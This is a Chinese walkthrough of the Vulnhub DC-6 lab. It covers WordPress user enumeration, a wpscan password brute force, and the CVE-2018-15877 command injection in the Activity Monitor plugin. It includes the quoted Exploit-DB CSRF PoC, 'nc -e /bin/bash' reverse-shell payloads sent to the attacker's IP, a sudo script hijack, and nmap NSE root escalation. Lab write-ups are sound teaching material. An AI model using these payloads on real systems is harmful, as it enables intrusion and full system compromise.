Vulnhub靶场DC-6练习

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
    • 1. wordpress扫描
    • 2. wordlists字典爆破
  • 0x03 漏洞查找与利用
    • 1. 漏洞查找
    • 2. CVE-2018-15877漏洞利用
    • 3. 反弹shell
    • 5. nmap提权
  • 0x04 总结

0x00 准备


下载链接:https://download.vulnhub.com/dc/DC-6.zip

介绍:CLUE
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

在Description部分没有什么可以注意的信息,但是CLUE部分有需要注意的内容。给出了一条命令。/usr/share/wordlists/rockyou.txt是kali自带的字典。



0x01 主机信息收集


执行命令:ifconfig
kali本机的ip:192.168.22.48,网卡eth0


发现目标主机ip:netdiscover -i eth0 -r 192.168.22.0/24
目标主机ip:192.168.22.47

在这里插入图片描述


探测目标主机的开放端口:nmap -sS -sV -A -n 192.168.22.47
开放端口:22端口,ssh服务;80端口,Apache httpd 2.4.25

在这里插入图片描述


0x02 站点信息收集


1. wordpress扫描


从上面nmap扫描开放端口的结果来看,80端口,不允许重定向到http://wordy。访问一下这个站点:192.168.22.47,可以看到确实被重定向到了这个站点。

在这里插入图片描述


解决方法就是在/etc/hosts文件中加入:192.168.22.47 wordy

在这里插入图片描述


再次访问就可以正常打开了。

在这里插入图片描述


扫描一下站点的目录结构:dirsearch -u 192.168.22.47

在这里插入图片描述


访问:http://wordy/wp-login.php,发现是wordpress的后台登录界面。考虑找用户名和密码。
kali自带一个专门扫描wordpress的工具wpscan。
利用wpscan枚举站点的账户:wpscan --url http://wordy --enumerate u

在这里插入图片描述


2. wordlists字典爆破


从结果看出,有这五个用户。前面给出的关于这个靶场的线索,有个字典。所以考虑用那个字典对这几个账户进行爆破。
将这几个用户名保存在name6.txt文件中:

在这里插入图片描述



rockyou这个字典需要先解压。
进入目录/usr/share/wordlists,发现rockyou.txt.gz文件。
(第一次使用wordlists字典的话,需要手动安装一下,安装命令:wordlists
执行命令进行解压:gzip -c -d /usr/share/wordlists/rockyou.txt.gz > /usr/share/wordlists/rockyou.txt
解压成功后,再执行线索中给出的命令:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

在这里插入图片描述


再利用wpscan,对这几个账户进行暴力破解,执行命令:wpscan --url [http://](http://xxx/)wordy -P passwords.txt -U name6.txt

在这里插入图片描述


跑出来了一组用户名密码:Username: mark, Password: helpdesk01
从http://wordy/wp-login.php登录进去系统。



0x03 漏洞查找与利用


1. 漏洞查找


这个站点使用了 Activity monitor插件。
执行命令搜索有没有相关的漏洞:searchsploit Activity monitor

在这里插入图片描述


看一下这个文件的内容:cat /usr/share/exploitdb/exploits/php/webapps/45274.html

<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing listDescription:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/PoC:
--><html><!--  Wordpress Plainview Activity Monitor RCE[+] Version: 20161228 and possibly prior[+] Description: Combine OS Commanding and CSRF to get reverse shell[+] Author: LydA(c)ric LEFEBVRE[+] CVE-ID: CVE-2018-15877[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well--><body><script>history.pushState('', '', '/')</script><form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"><input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /><input type="hidden" name="lookup" value="Lookup" /><input type="submit" value="Submit request" /></form></body>
</html> 

根据提示信息,查找一些CVE-2018-15877相关的内容。可以实现反弹shell。



2. CVE-2018-15877漏洞利用


在这里输入127.0.0.1,点击lookup,抓包。

在这里插入图片描述


抓包,发送到repeater模块。

在这里插入图片描述


将这个提交的参数改为:127.0.0.1|whoami,可以看到返回了www-data。说明这里可以执行命令。

在这里插入图片描述


3. 反弹shell


现在kali上监听4545端口:nc -lvvp 4545

在这里插入图片描述



构造反弹shell的命令:127.0.0.1|nc -e /bin/bash 192.168.22.48 4545 (kali的ip),点击send。

在这里插入图片描述


在kali中看到监听端口4545成功。

在这里插入图片描述


输入命令进入交互模式:python -c 'import pty;pty.spawn("/bin/bash")’

在这里插入图片描述


进入mark的家目录,可以找到一个things-to-do.txt的文件,看一下文件内容。
看到了graham的账号密码。

在这里插入图片描述


想到开启了22端口。考虑ssh登录到graham账户。密码:GSo7isUM1D4
在kali中重新开一个终端,执行命令:ssh graham@192.168.22.47
成功登录了。

在这里插入图片描述


5. nmap提权


执行命令:sudo -l,查看可以使用的命令。

在这里插入图片描述


从结果可以得到,jens用户可以不用密码就执行/home/jens/backups.sh脚本。
看一下这个脚本的内容,执行命令:cat /home/jens/backups.sh

在这里插入图片描述


这个脚本的作用是解压文件。可以考虑向这个脚本中写入/bin/bash,然后利用jens用户来执行这个脚本。
向这个脚本中写入/bin/bash,执行命令:echo "/bin/bash" >> /home/jens/[backups.sh](http://backups.sh/)
写入成功。

在这里插入图片描述


进入这个脚本所在的目录:cd /home/jens
利用jens用户来执行这个脚本:sudo -u jens ./backups.sh

在这里插入图片描述



已经切换到jens用户了。
再执行 sudo -l 查看可以jens用户可以使用的命令。

在这里插入图片描述


jens用户可以不用密码运行root权限的nmap命令。考虑进行nmap提权。
nmap提权分为两种:旧版本和新版本。
旧版本的利用方式是进入交互模式提权:

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本的利用方式:

echo 'os.execute("/bin/sh")' > shellnmap.nse #写一个root shell的文件,调用系统命令执行/bin/bash
sudo nmap --script=shellnmap.nse #运行,nse是nmap的插件的扩展名


这里用新版方式,运行上述两条命令。进入/root目录,可以查看到有theflag.txt文件,查看文件内容即可。

在这里插入图片描述


0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放端口和服务。

站点信息收集:

  1. dirsearch查看网站目录结构。
  2. wpscan扫描wordpress的用户。
  3. wpscan利用wordlists字典爆破密码。

漏洞利用:

  1. Activity monitor插件的漏洞:CVE-2018-15877。
  2. 反弹shell。
  3. nmap提权。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/372414.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

近红外光谱脑功能成像(fNIRS):2.实验设计、指标计算与多重比较

一、实验设计的策略与方法 近红外光谱成像&#xff08;INIRS&#xff09;作为一种非侵入性脑功能成像技术&#xff0c;为研究大脑活动提供了一种高效、生态效度高的方法。然而&#xff0c;为了充分利用INIRS技术并确保实验结果的准确性和可靠性&#xff0c;研究者必须精心设计实…

高阶面试-dubbo的学习

SPI机制 SPI&#xff0c;service provider interface&#xff0c;服务发现机制&#xff0c;其实就是把接口实现类的全限定名配置在文件里面&#xff0c;然后通过加载器ServiceLoader去读取配置加载实现类&#xff0c;比如说数据库驱动&#xff0c;我们把mysql的jar包放到项目的…

【库架一体立体库】与【传统立体库】对比

导语 大家好&#xff0c;我是社长&#xff0c;老K。专注分享智能制造和智能仓储物流等内容。 随着冷链物流行业的快速发展&#xff0c;对于冷藏设施的要求也在不断提高。库架一体式智能立体冷藏库以其高效、节能、智能化的特点&#xff0c;正逐渐成为行业发展的新趋势。 分享一…

UML中用例之间的可视化表示

用例除了与参与者有关联关系外&#xff0c;用例之间也存在着一定的关系&#xff0c;如泛化关系、包含关系、扩展关系等。 4.2.1 包含关系 包含关系指的是两个用例之间的关系&#xff0c;其中一个用例&#xff08;称为基本用例&#xff0c;Base Use Case&#xff09;的行为包…

el-tree 获取当前勾选节点的选中状态以及选中值对象 触发check-change多次事件问题原因

1.需求 现在需要一个树状结构的资产树 但是现在需求是 获取当前选中的值的状态是选中还是取消选中 然后再用当前选中 or 取消选中的值 进行 选中 or 取消选中的操作 一开始使用的是 check-change 方法 接收参数如图 但是我勾选父节点 或者 子节点后 他会打印一堆数据 是因…

理解JS与多线程

理解JS与多线程 什么是四核四线程&#xff1f; 一个CPU有几个核它就可以跑多少个线程&#xff0c;四核四线程就说明这个CPU同一时间最多能够运行四个线程&#xff0c;四核八线程是使用了超线程技术&#xff0c;使得单个核像有两个核一样&#xff0c;速度比四核四线程有多提升。…

Vivado FFT IP核使用

1. 今日摸鱼任务 学习Vivado FFT IP核的使用 Vivado_FFT IP核 使用详解_vivado fft ip核-CSDN博客 这篇写的很详细啦 简单做一点笔记进行记录 2. FFT IP核 xfft_0 ff (.aclk(aclk), // input wire aclk.aresetn(aresetn)…

C++编译链接原理

从底层剖析程序从编译到运行的整个过程 三个阶段 一、编译阶段二、链接阶段三、运行阶段 为了方便解释&#xff0c;给出两端示例代码&#xff0c;下面围绕代码进行实验&#xff1a; //sum.cpp int gdata 10; int sum(int a,int b) {return ab; }//main.cpp extern int gdata…

Java基础---复习01

main方法 一个程序有且只有一个main方法&#xff0c;main方法是java程序的唯一入口。 修饰符 修饰类修饰方法修饰域public都可以访问都可以访问private私有类只能本类只能本类protected子类可以继承、访问&#xff0c;同包下的类也可以访问子类可以继承、访问&#xff0c;同…

[AI 大模型] Google Gemini

文章目录 [AI 大模型] Gemini简介模型架构发展新技术和优势示例 [AI 大模型] Gemini 简介 Google Gemini 是 Google 最新推出的多模态 AI 大模型&#xff0c;旨在提升 AI 在各个领域的应用能力。Gemini 能够处理文本、图像、音频、视频和代码等多种数据类型&#xff0c;展现出…

暑期备考2024小学生古诗文大会:吃透真题和知识点(持续)

2024年上海市小学生古诗文大会的自由报名初赛将于10月19日&#xff08;星期六&#xff09;正式开始&#xff0c;还有3个多月的时间。 为帮助孩子们备考&#xff0c;我持续分享往年上海小学生古诗文大会真题&#xff0c;这些题目来自我去重、合并后的1700在线题库&#xff0c;每…

云计算渲染时代:选择Blender或KeyShot进行高效渲染

在云渲染技术日益成熟的背景下&#xff0c;挑选一款贴合项目需求的3D渲染软件显得尤为关键。当前&#xff0c;Blender与KeyShot作为业界领先的全能渲染解决方案&#xff0c;广受推崇。它们虽皆能创造出令人信服的逼真视觉效果&#xff0c;但在特色功能上各有所长。本篇文章旨在…

稀疏建模介绍,详解机器学习知识

目录 一、什么是机器学习&#xff1f;二、稀疏建模介绍三、Lasso回归简介四、Lasso超参数调整与模型选择 一、什么是机器学习&#xff1f; 机器学习是一种人工智能技术&#xff0c;它使计算机系统能够从数据中学习并做出预测或决策&#xff0c;而无需明确编程。它涉及到使用算…

华为HCIP Datacom H12-821 卷30

1.单选题 以下关于OSPF协议报文说法错误的是? A、OSPF报文采用UDP报文封装并且端口号是89 B、OSPF所有报文的头部格式相同 C、OSPF协议使用五种报文完成路由信息的传递 D、OSPF所有报文头部都携带了Router-ID字段 正确答案&#xff1a;A 解析&#xff1a; OSPF用IP报…

游戏AI的创造思路-技术基础-决策树(1)

决策树&#xff0c;是每个游戏人必须要掌握的游戏AI构建技术&#xff0c;难度小&#xff0c;速度快&#xff0c;结果直观&#xff0c;本篇将对决策树进行小小解读~~~~ 目录 1. 定义 2. 发展历史 3. 决策树的算法公式和函数 3.1. 信息增益&#xff08;Information Gain&…

无线网卡怎么连接台式电脑?让上网更便捷!

随着无线网络的普及&#xff0c;越来越多的台式电脑用户希望通过无线网卡连接到互联网。无线网卡为台式电脑提供了无线连接的便利性&#xff0c;避免了有线网络的束缚。本文将详细介绍无线网卡怎么连接台式电脑的四种方法&#xff0c;包括使用USB无线网卡、内置无线网卡以及使用…

终于搞定了通过两路蓝牙接收数据

一直想做无线传感器&#xff0c;通过蓝牙来接收数据&#xff0c;无奈因为arduino接收串口数据的一些问题&#xff0c;一直搁到现在。因为学校里给学生开了选修课&#xff0c;所以手边有一些nano和mega可以使用&#xff0c;所以就做了用两个nano加上两个蓝牙模块来发射数据&…

群体优化算法---文化算法介绍,求解背包问题

介绍 文化算法&#xff08;Cultural Algorithm, CA&#xff09;是一种基于文化进化理论的优化算法&#xff0c;首次由Robert G. Reynolds在20世纪90年代提出。文化算法通过模拟人类社会中的文化进化过程&#xff0c;利用个体与群体的双重进化机制来解决优化问题。其基本思想是…

动态数据库设计

动态数据库设计是一种灵活的方法&#xff0c;用于构建能够适应不断变化的数据需求的数据库结构。它强调在不频繁修改数据库表结构的前提下&#xff0c;有效管理和存储多样化的数据。以下是实现动态数据库设计的一些关键技术点和策略&#xff1a; 实体-属性-值&#xff08;EAV&a…

Java的面向对象基础

叠甲&#xff1a;以下文章主要是依靠我的实际编码学习中总结出来的经验之谈&#xff0c;求逻辑自洽&#xff0c;不能百分百保证正确&#xff0c;有错误、未定义、不合适的内容请尽情指出&#xff01; 文章目录 1.面向过程和面向对象2.访问限定符3.类和对象基础3.1.类的定义3.2.…